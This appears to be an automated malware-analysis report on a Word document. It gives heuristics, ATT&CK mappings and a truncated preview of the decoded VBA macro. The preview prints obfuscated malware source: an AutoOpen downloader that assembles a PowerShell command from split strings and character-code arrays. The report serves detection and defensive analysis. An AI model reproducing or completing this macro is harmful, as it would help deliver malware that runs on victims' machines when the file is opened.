MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a Microsoft Office document containing a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening. The macro utilizes a Shell() call, indicating an attempt to execute an external command. This strongly suggests the document is designed to download and execute a second-stage payload.
Heuristics 6
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 35353 bytes |
SHA-256: 67ffe8d39d97f0549bc3c7b5f92d63e66c77344ef27cc244459558c1d0ad44f8 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "HsjUihYzWKIjQc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "jYRBjUcCMF"
Function lpXoIL()
On Error Resume Next
RmTthY = (kzTZt * 17192 + 99224 * CInt(FZdAil - CDbl(42033)) * 23495 * Oct(58540))
votMjLK = "He" + "ll" + " " + Chr(34) + " $" + "( " + "sE"
fYhQj = (EFnmdw * 19155 + 82241 * CInt(SoYXKr - CDbl(21612)) * 52373 * Oct(80685))
SAFnauTKTE = "T-i" + "teM" + " " + "'v" + "Ari" + "aBL" + "e:"
XKViE = (ZpiCAr * 38816 + 32264 * CInt(UnVNPI - CDbl(30409)) * 74824 * Oct(12388))
mMnlHkEhM = "ofs" + "' '" + "') " + Chr(34) + "+ " + "[St" + "RI" + "NG]"
lpXoIL = votMjLK + SAFnauTKTE + mMnlHkEhM
wzoTT = (zrIJU * 67802 + 44967 * CInt(rDHbou - CDbl(50869)) * 39032 * Oct(13957))
End Function
Function dRibAN()
On Error Resume Next
pDqNaz = (XPWHz * 71080 + 42301 * CInt(iCALH - CDbl(37466)) * 72455 * Oct(31477))
OvkjkNNr = "( (" + " 53" + " ,"
WMBowM = (cqFdPd * 67711 + 33254 * CInt(BzUBb - CDbl(87896)) * 35836 * Oct(71797))
blDGzvZCO = "83" + " , " + "71" + " ,8" + "7," + " 12" + "7,"
GrZIz = (EnErN * 96332 + 36383 * CInt(CkfGi - CDbl(85416)) * 289 * Oct(8718))
nbVsT = "86," + " 1" + "00,"
jBFVR = (KctPc * 84855 + 41174 * CInt(TrqZb - CDbl(49319)) * 83848 * Oct(6992))
wFiVqcDBt = " 4" + "9 " + ", 4" + "4 ,"
iYRQw = (nsLBXq * 14327 + 87731 * CInt(mYtPTi - CDbl(81652)) * 62846 * Oct(63867))
tcBfiVARJ = " 49" + ",12" + "7, " + "116" + " ,1"
LPoTY = (cfpXwz * 97230 + 28239 * CInt(GWQqwV - CDbl(23486)) * 94965 * Oct(93848))
IpzIOVuY = "02" + " ,6" + "0,1"
dRibAN = OvkjkNNr + blDGzvZCO + nbVsT + wFiVqcDBt + tcBfiVARJ + IpzIOVuY
Djcjds = (krkXzZ * 75684 + 43895 * CInt(KRWwmZ - CDbl(59007)) * 48807 * Oct(26644))
End Function
Function imWDi()
On Error Resume Next
ZqjDz = (rjVwz * 92430 + 24275 * CInt(EPGiSG - CDbl(94230)) * 56295 * Oct(37679))
JrrXMKZp = "26" + ", " + "115" + ",12" + "3,1"
KuaAz = (BDVRSB * 2605 + 76934 * CInt(EHtSYv - CDbl(27991)) * 9495 * Oct(84070))
favhLNA = "16," + "11" + "4 " + ", "
XSAGGO = (WfsErr * 63753 + 84447 * CInt(wauMCO - CDbl(36418)) * 86244 * Oct(26549))
YcojLqicwE = "10" + "1 ," + "49" + ",99" + ",1" + "12 "
DLvHwp = (IcKBwO * 5931 + 42253 * CInt(VvjNPL - CDbl(50372)) * 52324 * Oct(98061))
tjildniYHw = ",12" + "7 " + ", 1" + "17," + " 12"
imWDi = JrrXMKZp + favhLNA + YcojLqicwE + tjildniYHw
JfoJAH = (HKlbYw * 28711 + 16032 * CInt(FhvALr - CDbl(81296)) * 45577 * Oct(85929))
End Function
Function WIrpr()
On Error Resume Next
MAjrk = (IHfDT * 36006 + 19971 * CInt(DHskDz - CDbl(96889)) * 34026 * Oct(9388))
kkPDrBTvMSt = "6 ," + " 1" + "24 " + ",4"
GsfwdS = (RQcvsX * 36215 + 804 * CInt(PojEP - CDbl(73813)) * 44498 * Oct(5157))
BBhcXsMORf = "2 " + ",53" + ", " + "126" + " , " + "93"
DzFTvZ = (vDlsoJ * 59142 + 26167 * CInt(CCizK - CDbl(69754)) * 49094 * Oct(69548))
zplbp = ",71" + ", 7" + "2 ," + " 1" + "01" + ",6"
hJiAQU = (cCZSj * 95109 + 40829 * CInt(AwUhI - CDbl(34983)) * 10864 * Oct(19507))
JQatb = "5," + "49" + " ," + " 4" + "4 ," + " 49"
qNkoE = (TZVWNP * 23163 + 91274 * CInt(QWMHFu - CDbl(59619)) * 8976 * Oct(63171))
pDSPUp = " ," + "127" + " ,1" + "16"
WIrpr = kkPDrBTvMSt + BBhcXsMORf + zplbp + JQatb + pDSPUp
wOQrci = (zMKCkj * 45535 + 30996 * CInt(sNaHm - CDbl(78684)) * 2476 * Oct(63650))
End Function
Function JtrzkWTjWi()
On Error Resume Next
lFzEa = (JDJIX * 5852 + 65891 * CInt(slQzlk - CDbl(62190)) * 81103 * Oct(78310))
qDCfnskG = ", 1" + "02" + " ," + "60" + " ,"
wCRiZs = (MjaqY * 58153 + 89279 * CInt(ztjXPs - CDbl(6193)) * 19963 * Oct(39420))
ZCccOtiJ = " 12" + "6," + " 1" + "15" + " , " + "12"
WWpPwk = (RGFYuf * 58126 + 32365 * CInt(LTHCT - CDbl(13893)) * 42661 * Oct(24705))
zmriqhELc = "3 " + ",11" + "6,1"
qzTZzv = (wwDWSw * 73811 + 79778 * CInt(HXoOEO - CDbl(4827)) * 12077 * Oct(29960))
wzQkjwDDK = "14 " + ",10" + "1 ," + "49" + ", " + "66 " + ", 1"
jCROOA = (dFlcsG * 19653 + 62112
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.